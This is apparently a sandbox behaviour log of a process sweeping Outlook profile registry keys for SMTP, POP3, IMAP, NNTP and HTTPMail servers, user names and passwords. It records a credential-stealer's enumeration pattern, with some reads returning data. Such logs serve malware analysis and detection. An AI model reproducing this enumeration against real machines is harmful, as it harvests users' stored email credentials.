Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\626dbd3f36ef4b4b9263a867695919ec value_name = IMAP Port, data = 0, type = REG_NONE False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046 value_name = SMTP Email Address False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046 value_name = SMTP Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046 value_name = POP3 Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046 value_name = POP3 User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046 value_name = SMTP User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046 value_name = NNTP Email Address False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046 value_name = NNTP User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046 value_name = NNTP Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046 value_name = IMAP Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046 value_name = IMAP User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046 value_name = Email False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046 value_name = HTTP User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046 value_name = HTTP Server URL False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046 value_name = POP3 User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046 value_name = IMAP User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046 value_name = HTTPMail User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046 value_name = HTTPMail Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046 value_name = SMTP User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046 value_name = POP3 Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046 value_name = IMAP Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046 value_name = NNTP Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046 value_name = HTTPMail Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046 value_name = SMTP Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046 value_name = POP3 Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046 value_name = IMAP Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046 value_name = NNTP Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046 value_name = HTTP Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046 value_name = SMTP Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046 value_name = POP3 Port, data = 0, type = REG_NONE False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046 value_name = SMTP Port, data = 0, type = REG_NONE False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046 value_name = IMAP Port, data = 0, type = REG_NONE False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 value_name = SMTP Email Address False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 value_name = SMTP Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 value_name = POP3 Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 value_name = POP3 User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 value_name = SMTP User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 value_name = NNTP Email Address False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 value_name = NNTP User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 value_name = NNTP Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 value_name = IMAP Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 value_name = IMAP User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 value_name = Email False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 value_name = HTTP User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 value_name = HTTP Server URL False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 value_name = POP3 User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 value_name = IMAP User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 value_name = HTTPMail User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 value_name = HTTPMail Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 value_name = SMTP User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 value_name = POP3 Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 value_name = IMAP Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 value_name = NNTP Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 value_name = HTTPMail Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 value_name = SMTP Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 value_name = POP3 Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 value_name = IMAP Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 value_name = NNTP Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 value_name = HTTP Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 value_name = SMTP Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 value_name = POP3 Port, data = 0, type = REG_NONE False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 value_name = SMTP Port, data = 0, type = REG_NONE False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 value_name = IMAP Port, data = 0, type = REG_NONE False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 value_name = SMTP Email Address False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 value_name = SMTP Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 value_name = POP3 Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 value_name = POP3 User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 value_name = SMTP User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 value_name = NNTP Email Address False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 value_name = NNTP User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 value_name = NNTP Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 value_name = IMAP Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 value_name = IMAP User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 value_name = Email False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 value_name = HTTP User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 value_name = HTTP Server URL False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 value_name = POP3 User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 value_name = IMAP User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 value_name = HTTPMail User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 value_name = HTTPMail Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 value_name = SMTP User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 value_name = POP3 Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 value_name = IMAP Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 value_name = NNTP Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 value_name = HTTPMail Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 value_name = SMTP Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 value_name = POP3 Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 value_name = IMAP Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 value_name = NNTP Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 value_name = HTTP Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 value_name = SMTP Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 value_name = POP3 Port, data = 0, type = REG_NONE False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 value_name = SMTP Port, data = 0, type = REG_NONE False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 value_name = IMAP Port, data = 0, type = REG_NONE False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = SMTP Email Address False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = SMTP Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = POP3 Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = POP3 User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = SMTP User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = NNTP Email Address False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = NNTP User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = NNTP Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = IMAP Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = IMAP User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = Email False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = HTTP User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = HTTP Server URL False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = POP3 User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = IMAP User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = HTTPMail User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = HTTPMail Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = SMTP User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = POP3 Password2 False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = IMAP Password2 False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = NNTP Password2 False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = HTTPMail Password2 False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = SMTP Password2 False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = POP3 Password False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = IMAP Password False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = NNTP Password False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = HTTP Password False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = SMTP Password False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = POP3 Port, data = 0, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = SMTP Port, data = 0, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = IMAP Port, data = 0, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = HTTP Password False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = SMTP Password False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = POP3 Port, data = 0, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = SMTP Port, data = 0, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 value_name = IMAP Port, data = 0, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = SMTP Email Address False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = SMTP Server True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = SMTP Server, data = 114 True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = POP3 Server True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = POP3 Server, data = 102 True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = POP3 User Name False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = SMTP User Name False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = NNTP Email Address False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = NNTP User Name False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = NNTP Server False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = IMAP Server False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = IMAP User Name False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = Email True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = Email, data = 108 True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = HTTP User False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = HTTP Server URL False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = POP3 User True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = POP3 User, data = 108 True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = IMAP User False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = HTTPMail User Name False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = HTTPMail Server False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = SMTP User False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = POP3 Password2 False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = IMAP Password2 False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = NNTP Password2 False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = HTTPMail Password2 False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = SMTP Password2 False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = POP3 Password False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = IMAP Password False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = NNTP Password False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = HTTP Password False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = SMTP Password False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = POP3 Port, data = 0, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = SMTP Port, data = 0, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 value_name = IMAP Port, data = 0, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = SMTP Email Address False 2
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 value_name = SMTP Server False 2
